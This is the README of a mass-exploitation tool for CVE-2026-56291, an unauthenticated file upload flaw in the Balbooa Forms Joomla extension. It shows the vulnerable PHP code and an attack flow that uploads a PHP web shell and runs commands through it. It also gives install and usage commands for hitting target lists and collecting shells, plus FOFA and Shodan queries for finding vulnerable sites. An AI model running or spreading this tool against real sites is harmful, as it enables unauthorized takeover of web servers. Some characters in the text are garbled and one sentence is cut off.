Share
## https://sploitus.com/exploit?id=F8A753B9-90EC-54D0-AC19-CAD8EE292E6C
CVE-2026-56291 โ Balbooa Forms Joomla Mass RCE Exploit
Pre-Auth form.uploadAttachmentFile โ No CSRF โ PHP Upload
---
## Overview
**CVE-2026-56291** is a critical (CVSS 9.8) unauthenticated arbitrary file upload vulnerability in the **Balbooa Forms** (com_baforms) Joomla extension ( **CISA KEV:** Added July 10, 2026 โ active exploitation confirmed.
---
## Vulnerability Mechanism
### Root Cause
```php
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext; // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);
```
### Attack Flow
```
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
file = shell.php (multipart)
โ Saved to images/baforms/uploads/form-1/shell.php
โ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
โ RCE
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt
```
## Usage
```bash
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup
```
---
## FOFA / Shodan
```
FOFA: body="com_baforms"
Shodan: http.html:"baforms"
```
---
## References
| Resource | Link |
|---|---|
| CISA KEV | [cisa.gov/known-exploited-vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) |
| Fix Details | [mysites.guru](https://mysites.guru/blog/balbooa-forms-unauthenticated-file-upload-flaw/) |
| Researcher | Phil Taylor |
---
Not affiliated with Balbooa.